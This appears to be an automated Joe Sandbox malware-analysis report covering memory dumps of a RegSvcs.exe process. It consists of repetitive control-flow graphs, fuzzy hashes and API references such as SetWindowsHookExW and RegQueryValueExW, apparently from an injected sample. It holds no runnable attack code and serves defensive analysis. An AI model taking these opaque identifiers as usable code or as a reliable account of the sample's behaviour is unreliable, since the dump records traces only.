                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 98f2c183b771ad7ef742967000f831f5e4a3356cada5daef33e2669665d08b1f
                                                                                          • Instruction ID: 1fad1175da44e7a0ae6c3f2459236a414f12f0c1f463d0afb49be8cd2b86c2ca
                                                                                          • Opcode Fuzzy Hash: 98f2c183b771ad7ef742967000f831f5e4a3356cada5daef33e2669665d08b1f
                                                                                          • Instruction Fuzzy Hash: BB02A43490522CCFCB65DF68C99869DBB72BF4A305F2089EAD40AA6350DB319EC5CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 4036 5a76f4-5a775d 4175 5a775d call 5ab768 4036->4175 4176 5a775d call 5ab7b8 4036->4176 4177 5a775d call 5aba68 4036->4177 4178 5a775d call 5aba08 4036->4178 4179 5a775d call 5ab70f 4036->4179 4180 5a775d call 5ab720 4036->4180 4181 5a775d call 5ab967 4036->4181 4043 5a7763-5a77e7 call 5ac790 4193 5a77e7 call a82d6f 4043->4193 4194 5a77e7 call a82d10 4043->4194 4195 5a77e7 call a82d02 4043->4195 4049 5a77ed-5a782c 4198 5a782c call a82ec8 4049->4198 4199 5a782c call a82f12 4049->4199 4052 5a7832-5a7868 4208 5a7868 call a83050 4052->4208 4209 5a7868 call a82ff0 4052->4209 4055 5a786e-5a78ad 4219 5a78ad call a837f8 4055->4219 4220 5a78ad call a83748 4055->4220 4221 5a78ad call a83857 4055->4221 4058 5a78b3-5a78f2 4225 5a78f2 call a838b8 4058->4225 4226 5a78f2 call a83918 4058->4226 4227 5a78f2 call a83977 4058->4227 4061 5a78f8-5a7937 4230 5a7937 call a839d8 4061->4230 4231 5a7937 call a83a38 4061->4231 4232 5a7937 call a83a97 4061->4232 4064 5a793d-5a7a06 4239 5a7a06 call a8432e 4064->4239 4240 5a7a06 call a84390 4064->4240 4073 5a7a0c-5a7a90 4245 5a7a90 call a848c8 4073->4245 4246 5a7a90 call a84820 4073->4246 4247 5a7a90 call a84830 4073->4247 4248 5a7a90 call a84927 4073->4248 4079 5a7a96-5a7b30 KiUserExceptionDispatcher 4186 5a7b30 call a84e68 4079->4186 4187 5a7b30 call a84da0 4079->4187 4188 5a7b30 call a84ec7 4079->4188 4085 5a7b36-5a7b75 4196 5a7b75 call a84f88 4085->4196 4197 5a7b75 call a84f29 4085->4197 4088 5a7b7b-5a7bff 4210 5a7bff call a852e8 4088->4210 4211 5a7bff call a85348 4088->4211 4212 5a7bff call a85659 4088->4212 4213 5a7bff call a85490 4088->4213 4094 5a7c05-5a7c89 4228 5a7c89 call a865c8 4094->4228 4229 5a7c89 call a865d0 4094->4229 4100 5a7c8f-5a7d5e 4235 5a7d5e call a87958 4100->4235 4236 5a7d5e call a87aa8 4100->4236 4109 5a7d64-5a7da6 4241 5a7da6 call a87da8 4109->4241 4242 5a7da6 call a87d98 4109->4242 4112 5a7dac-5a7e2a 4249 5a7e2a call a89668 4112->4249 4250 5a7e2a call a897b8 4112->4250 4251 5a7e2a call a89718 4112->4251 4118 5a7e30-5a7eba call a89a40 4189 5a7eba call a8a3c8 4118->4189 4190 5a7eba call a8a379 4118->4190 4191 5a7eba call a8a320 4118->4191 4192 5a7eba call a8a330 4118->4192 4124 5a7ec0-5a7f3e 4200 5a7f3e call a8af2f 4124->4200 4201 5a7f3e call a8aed0 4124->4201 4202 5a7f3e call a8ae20 4124->4202 4130 5a7f44-5a7f86 4214 5a7f86 call a8aff0 4130->4214 4215 5a7f86 call a8af91 4130->4215 4133 5a7f8c-5a7fce 4222 5a7fce call a8b410 4133->4222 4223 5a7fce call a8aff0 4133->4223 4224 5a7fce call a8af91 4133->4224 4136 5a7fd4-5a808e 4233 5a808e call a8cef0 4136->4233 4234 5a808e call a8cee4 4136->4234 4145 5a8094-5a80d6 4237 5a80d6 call a8e238 4145->4237 4238 5a80d6 call a8e234 4145->4238 4148 5a80dc-5a8166 4243 5a8166 call a8e5d0 4148->4243 4244 5a8166 call a8e570 4148->4244 4154 5a816c-5a81f6 4183 5a81f6 call a8efc8 4154->4183 4184 5a81f6 call a8efd0 4154->4184 4160 5a81fc-5a82c2 4203 5a82c2 call a8f8b8 4160->4203 4204 5a82c2 call a8f6a0 4160->4204 4205 5a82c2 call a8f7b6 4160->4205 4206 5a82c2 call a8f5f7 4160->4206 4207 5a82c2 call a8f977 4160->4207 4169 5a82c8-5a830a 4216 5a830a call a8fa38 4169->4216 4217 5a830a call a8fa31 4169->4217 4218 5a830a call a8fa97 4169->4218 4172 5a8310-5a835f 4175->4043 4176->4043 4177->4043 4178->4043 4179->4043 4180->4043 4181->4043 4183->4160 4184->4160 4186->4085 4187->4085 4188->4085 4189->4124 4190->4124 4191->4124 4192->4124 4193->4049 4194->4049 4195->4049 4196->4088 4197->4088 4198->4052 4199->4052 4200->4130 4201->4130 4202->4130 4203->4169 4204->4169 4205->4169 4206->4169 4207->4169 4208->4055 4209->4055 4210->4094 4211->4094 4212->4094 4213->4094 4214->4133 4215->4133 4216->4172 4217->4172 4218->4172 4219->4058 4220->4058 4221->4058 4222->4136 4223->4136 4224->4136 4225->4061 4226->4061 4227->4061 4228->4100 4229->4100 4230->4064 4231->4064 4232->4064 4233->4145 4234->4145 4235->4109 4236->4109 4237->4148 4238->4148 4239->4073 4240->4073 4241->4112 4242->4112 4243->4154 4244->4154 4245->4079 4246->4079 4247->4079 4248->4079 4249->4118 4250->4118 4251->4118
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 353ad7a3ee53eb0bbaa8eb84ea429efc8df8d47249275d29142f4a0128276854
                                                                                          • Instruction ID: 85715490175c85a602bbcadd35faf67f631146806bdc52474fa32c3e063cfb80
                                                                                          • Opcode Fuzzy Hash: 353ad7a3ee53eb0bbaa8eb84ea429efc8df8d47249275d29142f4a0128276854
                                                                                          • Instruction Fuzzy Hash: C302A43490522CCFCB65DF68C99869DBB72BF4A305F2089EAD40AA6350DB319EC5CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 4252 5a7739-5a775d 4421 5a775d call 5ab768 4252->4421 4422 5a775d call 5ab7b8 4252->4422 4423 5a775d call 5aba68 4252->4423 4424 5a775d call 5aba08 4252->4424 4425 5a775d call 5ab70f 4252->4425 4426 5a775d call 5ab720 4252->4426 4427 5a775d call 5ab967 4252->4427 4256 5a7763-5a77e7 call 5ac790 4439 5a77e7 call a82d6f 4256->4439 4440 5a77e7 call a82d10 4256->4440 4441 5a77e7 call a82d02 4256->4441 4262 5a77ed-5a782c 4444 5a782c call a82ec8 4262->4444 4445 5a782c call a82f12 4262->4445 4265 5a7832-5a7868 4454 5a7868 call a83050 4265->4454 4455 5a7868 call a82ff0 4265->4455 4268 5a786e-5a78ad 4388 5a78ad call a837f8 4268->4388 4389 5a78ad call a83748 4268->4389 4390 5a78ad call a83857 4268->4390 4271 5a78b3-5a78f2 4394 5a78f2 call a838b8 4271->4394 4395 5a78f2 call a83918 4271->4395 4396 5a78f2 call a83977 4271->4396 4274 5a78f8-5a7937 4399 5a7937 call a839d8 4274->4399 4400 5a7937 call a83a38 4274->4400 4401 5a7937 call a83a97 4274->4401 4277 5a793d-5a7a06 4408 5a7a06 call a8432e 4277->4408 4409 5a7a06 call a84390 4277->4409 4286 5a7a0c-5a7a90 4414 5a7a90 call a848c8 4286->4414 4415 5a7a90 call a84820 4286->4415 4416 5a7a90 call a84830 4286->4416 4417 5a7a90 call a84927 4286->4417 4292 5a7a96-5a7b30 KiUserExceptionDispatcher 4432 5a7b30 call a84e68 4292->4432 4433 5a7b30 call a84da0 4292->4433 4434 5a7b30 call a84ec7 4292->4434 4298 5a7b36-5a7b75 4442 5a7b75 call a84f88 4298->4442 4443 5a7b75 call a84f29 4298->4443 4301 5a7b7b-5a7bff 4456 5a7bff call a852e8 4301->4456 4457 5a7bff call a85348 4301->4457 4458 5a7bff call a85659 4301->4458 4459 5a7bff call a85490 4301->4459 4307 5a7c05-5a7c89 4397 5a7c89 call a865c8 4307->4397 4398 5a7c89 call a865d0 4307->4398 4313 5a7c8f-5a7d5e 4404 5a7d5e call a87958 4313->4404 4405 5a7d5e call a87aa8 4313->4405 4322 5a7d64-5a7da6 4410 5a7da6 call a87da8 4322->4410 4411 5a7da6 call a87d98 4322->4411 4325 5a7dac-5a7e2a 4418 5a7e2a call a89668 4325->4418 4419 5a7e2a call a897b8 4325->4419 4420 5a7e2a call a89718 4325->4420 4331 5a7e30-5a7eba call a89a40 4435 5a7eba call a8a3c8 4331->4435 4436 5a7eba call a8a379 4331->4436 4437 5a7eba call a8a320 4331->4437 4438 5a7eba call a8a330 4331->4438 4337 5a7ec0-5a7f3e 4446 5a7f3e call a8af2f 4337->4446 4447 5a7f3e call a8aed0 4337->4447 4448 5a7f3e call a8ae20 4337->4448 4343 5a7f44-5a7f86 4460 5a7f86 call a8aff0 4343->4460 4461 5a7f86 call a8af91 4343->4461 4346 5a7f8c-5a7fce 4391 5a7fce call a8b410 4346->4391 4392 5a7fce call a8aff0 4346->4392 4393 5a7fce call a8af91 4346->4393 4349 5a7fd4-5a808e 4402 5a808e call a8cef0 4349->4402 4403 5a808e call a8cee4 4349->4403 4358 5a8094-5a80d6 4406 5a80d6 call a8e238 4358->4406 4407 5a80d6 call a8e234 4358->4407 4361 5a80dc-5a8166 4412 5a8166 call a8e5d0 4361->4412 4413 5a8166 call a8e570 4361->4413 4367 5a816c-5a81f6 4429 5a81f6 call a8efc8 4367->4429 4430 5a81f6 call a8efd0 4367->4430 4373 5a81fc-5a82c2 4449 5a82c2 call a8f8b8 4373->4449 4450 5a82c2 call a8f6a0 4373->4450 4451 5a82c2 call a8f7b6 4373->4451 4452 5a82c2 call a8f5f7 4373->4452 4453 5a82c2 call a8f977 4373->4453 4382 5a82c8-5a830a 4462 5a830a call a8fa38 4382->4462 4463 5a830a call a8fa31 4382->4463 4464 5a830a call a8fa97 4382->4464 4385 5a8310-5a835f 4388->4271 4389->4271 4390->4271 4391->4349 4392->4349 4393->4349 4394->4274 4395->4274 4396->4274 4397->4313 4398->4313 4399->4277 4400->4277 4401->4277 4402->4358 4403->4358 4404->4322 4405->4322 4406->4361 4407->4361 4408->4286 4409->4286 4410->4325 4411->4325 4412->4367 4413->4367 4414->4292 4415->4292 4416->4292 4417->4292 4418->4331 4419->4331 4420->4331 4421->4256 4422->4256 4423->4256 4424->4256 4425->4256 4426->4256 4427->4256 4429->4373 4430->4373 4432->4298 4433->4298 4434->4298 4435->4337 4436->4337 4437->4337 4438->4337 4439->4262 4440->4262 4441->4262 4442->4301 4443->4301 4444->4265 4445->4265 4446->4343 4447->4343 4448->4343 4449->4382 4450->4382 4451->4382 4452->4382 4453->4382 4454->4268 4455->4268 4456->4307 4457->4307 4458->4307 4459->4307 4460->4346 4461->4346 4462->4385 4463->4385 4464->4385
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 2c31dea1a49fb03140845196ed3d0467a7d0b24476bc456d3ad717f03470d920
                                                                                          • Instruction ID: 1dc8a17069ed11529cf4b4eed61573db8bfa84d78fb68ff52bceceb244d3753b
                                                                                          • Opcode Fuzzy Hash: 2c31dea1a49fb03140845196ed3d0467a7d0b24476bc456d3ad717f03470d920
                                                                                          • Instruction Fuzzy Hash: 2602A43490522CCFCB65DF68C99869DBB72BF4A305F2089EAD40AA6350DB315EC5CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: cad818ed28f89503d75c0104a7ee86d83d8361ab589e3f186e7b0e1941c485a6
                                                                                          • Instruction ID: 2098c1b1ca3c36f623822e20ccfed7c54e0d00a688c53d3af8ed402d51de09ee
                                                                                          • Opcode Fuzzy Hash: cad818ed28f89503d75c0104a7ee86d83d8361ab589e3f186e7b0e1941c485a6
                                                                                          • Instruction Fuzzy Hash: 39F1A43490522CCFCB65DF68C99869DBB72BF4A305F2089EAD40AA6350DB315EC5CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 6f50873048b6d7e9b0f4f4ead298c82e07b05f81de84a406f85784aba73d7189
                                                                                          • Instruction ID: 743d5d8c50644f613f05587590e04320e3f75c5b0f41062e4af57a8ba3c88cc6
                                                                                          • Opcode Fuzzy Hash: 6f50873048b6d7e9b0f4f4ead298c82e07b05f81de84a406f85784aba73d7189
                                                                                          • Instruction Fuzzy Hash: 7EF1943490522CCFCB65DF68C99869DBB72BF4A305F2089EAD40AA6350DB315EC5CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 92b0f7973933ce63dfed712155bf6bbe04a29a915ba7be7d95f008062e6e3ca9
                                                                                          • Instruction ID: b42690facdfeba0052101dae40cea2a575a7d5c9d77e98ca40c7d3136403c46c
                                                                                          • Opcode Fuzzy Hash: 92b0f7973933ce63dfed712155bf6bbe04a29a915ba7be7d95f008062e6e3ca9
                                                                                          • Instruction Fuzzy Hash: 7DF1A43490522CCFCB65DF68C99869DBB72BF4A305F2089EAD40AA6350DB315EC5CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: c70d81efe0c477ac10a7ee1dee7f16cd7d12aa5c1b38b293908964b7f61d81d4
                                                                                          • Instruction ID: 73b300b0c1094852f7b17a8ca5204234aa717452e54e0c08bf9f74ded9ec832b
                                                                                          • Opcode Fuzzy Hash: c70d81efe0c477ac10a7ee1dee7f16cd7d12aa5c1b38b293908964b7f61d81d4
                                                                                          • Instruction Fuzzy Hash: 82F1A43490522CCFCB65DF68C99869DBB72BF4A305F2089EAD40AAA350DB315EC5CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 24934fb3969d5f57cc0371c921dc6cdc4180493da4c71b31761be1560b33df34
                                                                                          • Instruction ID: 99d9a3a0b5826674e052129cbc6e7a772b576e04ec0855f67294dd56828f27c8
                                                                                          • Opcode Fuzzy Hash: 24934fb3969d5f57cc0371c921dc6cdc4180493da4c71b31761be1560b33df34
                                                                                          • Instruction Fuzzy Hash: FDE1A43490522CCFCB65DF68C99869DBB72BF4A305F2089EAD40AA6350DB315EC5CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 1bdae95d0f6635aeb7ed404b01af0811910f0864bffcffe29a77037455eb99cf
                                                                                          • Instruction ID: 75517a640b2a79fc3631bc30ac2c299618d79817baedaffc6c133482a4400e8f
                                                                                          • Opcode Fuzzy Hash: 1bdae95d0f6635aeb7ed404b01af0811910f0864bffcffe29a77037455eb99cf
                                                                                          • Instruction Fuzzy Hash: 19E1A43490522CCFCB65DF78C99869DBB72BF4A305F2089EAD40AAA350DB315E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 731bc48c47a16d82ac7cf5e23b1418e2f362830b96551c2c6fad4b008cfc01ad
                                                                                          • Instruction ID: d7b1b1565bfc3a7f4ef6d221eb788eb9e9df8da406f1fff76f072fe0421df831
                                                                                          • Opcode Fuzzy Hash: 731bc48c47a16d82ac7cf5e23b1418e2f362830b96551c2c6fad4b008cfc01ad
                                                                                          • Instruction Fuzzy Hash: 7BE1953491522CCFCB65DF78C99869DBB72BF4A305F2089EAD40AA6350DB315E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 7bfc38974dcc1fa625bfbd94181986417d7fcd7279f01575ec00a685166d762c
                                                                                          • Instruction ID: 80c940ba85282ed0cecadc50581001fd7d52799d12f8f1a075b1e01e6482bd0f
                                                                                          • Opcode Fuzzy Hash: 7bfc38974dcc1fa625bfbd94181986417d7fcd7279f01575ec00a685166d762c
                                                                                          • Instruction Fuzzy Hash: 4CE1A53491522CCFCB65DF74C99869DBB72BF4A305F2089EAD40AAA350DB315E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: e70e8df7e12f3b01524ec52580eac503a0c939173918def21b9ff2d0db7a2560
                                                                                          • Instruction ID: d308f645813ff1d02c6a1b3244e5a82da2717ef0b1c68f547baeff46ea05f1ac
                                                                                          • Opcode Fuzzy Hash: e70e8df7e12f3b01524ec52580eac503a0c939173918def21b9ff2d0db7a2560
                                                                                          • Instruction Fuzzy Hash: 47D1A434905228CFCB65DF74C99869DBB72BF4A305F2089EAD40AAA350DB315EC5CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: c88c98aed0ef8c5d23d4a13d2265609d4a9546992f6d029732766114a712c81a
                                                                                          • Instruction ID: 5bcf5eb46b5310c7b00f11b0adbf4b21b9e0005f8c7ee0151a64d66223cebd0c
                                                                                          • Opcode Fuzzy Hash: c88c98aed0ef8c5d23d4a13d2265609d4a9546992f6d029732766114a712c81a
                                                                                          • Instruction Fuzzy Hash: 49D1A534905228CFCB65DF74C99869DBB72BF4A305F2089EAD40AAA350DB315EC5CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 20d38549ed96d303b87b4f4c03bcfb6736fd6844a343d701d36d9fdc9a07c65f
                                                                                          • Instruction ID: 7e8714bea2a39589192739e6674236e65d9368cc4e99dcbbce16e7d88036d694
                                                                                          • Opcode Fuzzy Hash: 20d38549ed96d303b87b4f4c03bcfb6736fd6844a343d701d36d9fdc9a07c65f
                                                                                          • Instruction Fuzzy Hash: 1AD1A534915228CFCB65DF74C99869DBB72BF4A305F2089EAD40EAA350DB315E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 526d6871100d3f96e5e9d5872cefcf062b99f153a730ec59985b5b5c70d94cfe
                                                                                          • Instruction ID: 3646908570406f16dccdfd6fa0356b67f8ad1188afc09e3e04f5403e8625f258
                                                                                          • Opcode Fuzzy Hash: 526d6871100d3f96e5e9d5872cefcf062b99f153a730ec59985b5b5c70d94cfe
                                                                                          • Instruction Fuzzy Hash: 19C1A434905228CFCB65DF38C99869DBB72BF4A305F2089EAD40AAA350DB315E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 005A7AD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985106090.00000000005A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_5a0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: ebf2441c9ca22a7b813395b8d63ea5b42a5f2b14744bd91087bf496962e9144e
                                                                                          • Instruction ID: 1eb2815e9bef2cd3d1ae5a4624a67a0e9128309bdafaf68c20dc112449cd1791
                                                                                          • Opcode Fuzzy Hash: ebf2441c9ca22a7b813395b8d63ea5b42a5f2b14744bd91087bf496962e9144e
                                                                                          • Instruction Fuzzy Hash: B6C19434915228CFCB65DF38C99869DBB72BF4A305F2089EAD40AAA750DB315E85CF41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00A836D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985543176.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_a80000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: 85cfb7bd788245086bbfd3df9b56dbebe9847fb0f903abcc3fa24b8dd9caa3ac
                                                                                          • Instruction ID: 4bb3770bc6edb6f79515d24f81a40dc8d689b538a46cdf80cf4713617ca8bad2
                                                                                          • Opcode Fuzzy Hash: 85cfb7bd788245086bbfd3df9b56dbebe9847fb0f903abcc3fa24b8dd9caa3ac
                                                                                          • Instruction Fuzzy Hash: 2B4136B1E00249DFCB10DFA9D888ADEBFF5AF48710F15842AE819AB350D7759905CF91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00A836D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985543176.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_a80000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: 5c79a1886ce3a61616fd7eca0b6014be47a8de66f16af063b86330c361f77450
                                                                                          • Instruction ID: 59e810478ebb02033cd9a3599ca752cd2ef4085edc1fdec707c914241a962ac6
                                                                                          • Opcode Fuzzy Hash: 5c79a1886ce3a61616fd7eca0b6014be47a8de66f16af063b86330c361f77450
                                                                                          • Instruction Fuzzy Hash: 0931D2B1D00258AFCB10DF9AC884A9EFFF5BF48710F15842AE819AB310D7759905CF91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00B03753
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985697815.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_b00000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: HookWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2559412058-0
